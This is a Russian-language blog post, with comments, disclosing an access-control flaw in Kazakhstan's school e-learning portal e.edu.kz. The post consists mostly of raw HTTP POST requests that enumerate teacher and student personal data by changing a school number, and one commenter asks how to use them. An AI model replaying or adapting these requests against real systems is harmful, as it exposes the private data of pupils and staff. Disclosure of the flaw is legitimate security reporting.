Уязвимый Казнет и не только

Персональные данные всех школ РК

Небольшая недоработка программистов системы E-Learning http://e.edu.kz позволяет получить доступ к персональным данным персонала и учащихся всех школ.

POST /nedb-passport/teachers HTTP/1.1
Host: e.edu.kz
Connection: close
Content-Length: 8
Accept: text/html, */*; q=0.01
Origin: https://e.edu.kz
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: **********;


school=1

POST /nedb-passport/teachers HTTP/1.1
Host: e.edu.kz
Connection: close
Content-Length: 8
Accept: text/html, */*; q=0.01
Origin: https://e.edu.kz
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: **********;


school=2

POST /nedb-passport/students HTTP/1.1
Host: e.edu.kz
Connection: close
Content-Length: 8
Accept: text/html, */*; q=0.01
Origin: https://e.edu.kz
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: **********;

school=1

e.edu.kz, E-Learning

Serj, 17 августа 2016

Динмухамед Зияшев

Динмухамед Зияшев
25 августа 2018 17:23

как можно мне этим способом воспользоваться -чисто ради интереса

25 августа 2018 17:23 Комментировать
Anatolii Mr

Anatolii Mr
1 августа 2018 20:12

Когда работал разработчиком в одном Вузе еще лет 10 назад, запил ejournal (электронный журнал), похожую систему, но начальство и ректорат оказался настолько самодурами, что в итоге зарубили идею, а ведь при должной поддержке можно было бы разработать систему не имеющую аналогов, столько было идей... никакой elearning рядом бы не валялся. Возможно они некоторые идеи и подсмотрели, помню как они приезжали презентовали свой тогда еще зачаточный проект. А учитывая уровень что тогдашних что нынешних специалистов, не удивительно багов как грибов. Даже сейчас те идеи не устарели. В разработке вообще фантазия и творческий подход важны. Жаль, мало кто на это способен, отдаваться делу.

1 августа 2018 20:12 Комментировать
Куаныш Куанышевич

Куаныш Куанышевич
2 октября 2016 15:21

Здесь надо поработать над MSQL

2 октября 2016 15:21 Комментировать
Куаныш Куанышевич

Куаныш Куанышевич
2 октября 2016 15:00

Об информационной безопасности вообще не думают . При разработке сайтов или веб приложении самое важное надо задуматься об безопасности инфо

2 октября 2016 15:00 Комментировать
Куаныш Куанышевич

Куаныш Куанышевич
2 октября 2016 14:58

Серёга да там они баг допустили походу не прикрыли дерикторию . Это называется у нас криворукость

2 октября 2016 14:58 Комментировать
DELETED

DELETED
27 августа 2016 02:53

статья

27 августа 2016 02:53 Комментировать
1. Павел Федяков
  
  Павел Федяков
  29 августа 2016 03:41
  
  Интернет надо им ченить а не статья.
  
  29 августа 2016 03:41 Комментировать
2. Павел Федяков
  
  Павел Федяков
  29 августа 2016 03:43
  
  Он же размыл большую часть цифр, так что не вся информация донесена. А так же Ф.И.О
  
  29 августа 2016 03:43 Комментировать
3. DELETED
  
  DELETED
  29 августа 2016 12:56
  
  Павел, при чем тут интернет тут разглашение гос тайны
  
  29 августа 2016 12:56 Комментировать
4. Павел Федяков
  
  Павел Федяков
  29 августа 2016 19:32
  
  Марат, а разве гос тайна что нет достаточно квалифицированных кадров? Я думаю нет, и ещё не тайна что у нас интернет самый худший .
  
  29 августа 2016 19:32 Комментировать
5. DELETED
  
  DELETED
  1 сентября 2016 11:53
  
  Павел, ты что пишеш сам читал смысл твой слов
  
  1 сентября 2016 11:53 Комментировать